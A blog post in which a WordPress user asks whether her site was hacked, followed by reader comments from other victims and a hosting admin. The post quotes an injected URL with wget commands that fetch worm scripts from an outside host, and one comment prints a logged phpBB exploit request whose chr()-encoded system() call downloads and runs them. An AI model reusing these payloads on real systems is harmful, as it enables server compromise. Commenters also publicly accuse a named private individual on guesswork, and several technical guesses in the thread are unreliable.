Huh? Did someone hack my site? I loaded the page and got no CSS, so checked the template to find that the link to the CSS file had been replaced by this (I added line breaks, this was really all one long line):

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/wp-layout.css

My template was fine, so I looked at the options, and sure enough, my “site URL”, which WordPress glues into the template for almost every link it makes and which is supposed to be simply this: “http://huminf.uib.no/~jill/”, had been changed to all the following:

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net

That looks very uncool. Now even to a total amateur at PHP like me, that seems to read as though every time someone looks at my blog, instead of the site fetching a CSS file that makes the page look pretty, an action is invoked that “gets” (“wget”, yeah?) a whole pile of nasty files called things like spy.gif and worm1.txt.

Does anyone understand this? What are they actually trying to do? Would this affect readers or my site? Would I have seen all sorts of stupid messages about how “spykids ownz your browser” if I’d been using Windows and Microsoft Explorer isntead of Firefox on a Mac? And how the heck did they change my site URL?

I fixed it, but I should obviously do something about security, huh? Except it’s Christmas! I don’t have time for this!!!
[I’ve asked for help at the WordPress support forum as well, and I filed a complain against visualcoders.net with Google, who run adwords through them. And I emailed the person who registered the domain, Mimoun Raddahi, who lives in Antwerpen, Belgium. Is there any chance visualcoders.net isn’t to blame here?]

10 thoughts on “did my blog just get hacked?

  1. L33tdawg

    The attack you speak of is actually quite well known — if you look at the contents of the text files you’ll see that they’re basically PERL scripts designed to compromise anyone who unsuspectingly clicks on the link and is vulnerable (IE users only). That being said, if you examine the ownz.txt file you’ll see that this ‘kit’ has been assembled by the rather well known group ‘Spykids’ (http://www.zone-h.org/en/defacements/filter/filter_defacer=spykids). It looks like you either have a member of Spykids trying to ‘own’ your site or a script kiddie who happens to have the spykid ‘kit’ so to speak. You might want to see if there are any vulns for your version of WordPress.

    Good luck.

    Cheers,
    LD.

  2. Elin

    Something odd is happening at my site too – my index file is being replaced now and then. It has been happening for some months – but I don’t have time to look at it. Argh.

  3. AWolf

    wget is a network utility to retrieve files from the Web using http and ftp and it runs from the command line in *nix operating systems. It is very useful for mirroring sites and if you aren’t careful, it might try to download the entire internet onto your server (a mistake I made several years ago when I was moving my websites to a new service provider). Also the “%20” is a blank space in html. My original guess was that visualcoders.net was the intended victim of your site being hacked. That is just a guess.

  4. Tom Bartling

    One of my websites also got hit, although I haven’t found any negative effects. They tried to access a page that’s looking for an ID number, but they replaced the ID with the same info that you posted.

    I did a little research.
    The hit came from IP address 213.193.231.130.
    213.193.231.130 is owned by Tom Myny at Linux Systems.
    The script pointed to visualcoders.net.
    Tracking the IP for visualcoders.net using traceroute (or tracert on Windows) finds visualcoders.net is located at 213.193.231.130.
    visualcoders.net is owned by Mimoun Raddahi.
    The original email address for Mimoun Raddahi is mimoun@pandora.be
    pandora.be is a domain that is owned by Telenet.

    I suspect that Mimoun Raddahi is the hacker. I sent an email to Tom Myny at Linux Systems (the hosting company for visualcoders.net), and I copied the Technical Contact at Telenet.

    Hopefully, this will resolve the hacking problem.

    On a side note, this happened to me on Dec. 26th. While doing research, I Googled “Mimoum Raddahi” and found this website, one day after your posting. Man, google is fast.

  5. Tom Myny

    Hi All,

    A script was running on our servers (wget%20www.visualcoders.net/spybot.txt;
    wget%20www.visualcoders.net/worm1.txt;) because one of the customers phpbb sites was hacked. (viewforum.php bug)
    I removed the buggy php file and stopped the processes.
    visualcoders.net is not hosted by us (never was …)

    perl php.txt SERVER_SIGNATURE=

    Apache/1.3.31 Server at http://www.tegenwind.be Port 80

    ? UNIQUE_ID=Qc5aCdXB54IAABRQNuQ HTTP_USER_AGENT=lwp-trivial/1.35 SERVER_PORT=80 HTTP_HOST=www.tegenwind.be SCRIPT_FILENAME=forum/viewtopic.php REQUEST_URI=/forum/viewtopic.php?t=97&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 SCRIPT_NAME=/forum/viewtopic.php REMOTE_HOST=sun2.netwerkshop.nl REMOTE_PORT=56449 PATH=/bin:/usr/bin PWD=/tmp SERVER_ADMIN=webmaster@linuxsystems.be REDIRECT_STATUS=200 PATH_TRANSLATED=forum/viewtopic.php REMOTE_ADDR=194.109.209.106 SHLVL=1 SERVER_NAME=www.tegenwind.be

    Best Regards,
    Tom

  6. Messenger

    HOLA

  7. Lars

    Indeed the 1st Google return for Mimoun Raddahi is this thread..!!!

    Our stats file showed a 5x leap in page views on xmas day and from looking at the log files I found pretty much the same string described above.. hitting us every couple of seconds and coming from multiple IP addys.

    Then I noticed a repetative request string using LWP:
    http://www.google.com/search?hl=en&q=LWP&btnG=Google+Search
    which looks like a data scrape script. I reported the flood
    to Go Daddy but wouldn’t ya know it; visualcoders.net is now
    hosted (already) somewhere else.

    At least we haven’t had any problems with re-write of our files
    but this kind of action def. borders on the crimminal, imho 8-(

  8. Jill

    Wow, thanks guys, for the speedy work! Google works really fast, yes…

    There’s a lot more about this kind of attack on WordPress blog in the WordPress support forums – it’s done simply by typing commands into the URL. The vulnerability is fixed in the latest version of WordPress, or you can delete a few lines from one of the files in earlier versions to protect your system. Discussions are here and here.

    Scary, huh?

  9. k

    welcome to the internet.

  10. Bryan-Mitchell Young

    Apparently, it is a new worm going around that attacks PHP sites, including wordpress.

Leave a Reply to Bryan-Mitchell Young Cancel reply

Recommended Posts

Triple book talk: Watch James Dobson, Jussi Parikka and me discuss our 2023 books

Thanks to everyone who came to the triple book talk of three recent books on machine vision by James Dobson, Jussi Parikka and me, and thanks for excellent questions. Several people have emailed to asked if we recorded it, and yes we did! Here you go! James and Jussi’s books […]

Image on a black background of a human hand holding a graphic showing the word AI with a blue circuit board pattern inside surrounded by blurred blue and yellow dots and a concentric circular blue design.
AI and algorithmic culture Machine Vision

Four visual registers for imaginaries of machine vision

I’m thrilled to announce another publication from our European Research Council (ERC)-funded research project on Machine Vision: Gabriele de Setaand Anya Shchetvina‘s paper analysing how Chinese AI companies visually present machine vision technologies. They find that the Chinese machine vision imaginary is global, blue and competitive.  De Seta, Gabriele, and Anya Shchetvina. “Imagining Machine […]

Do people flock to talks about ChatGPT because they are scared?

Whenever I give talks about ChatGPT and LLMs, whether to ninth graders, businesses or journalists, I meet people who are hungry for information, who really want to understand this new technology. I’ve interpreted this as interest and a need to understand – but yesterday, Eirik Solheim said that every time […]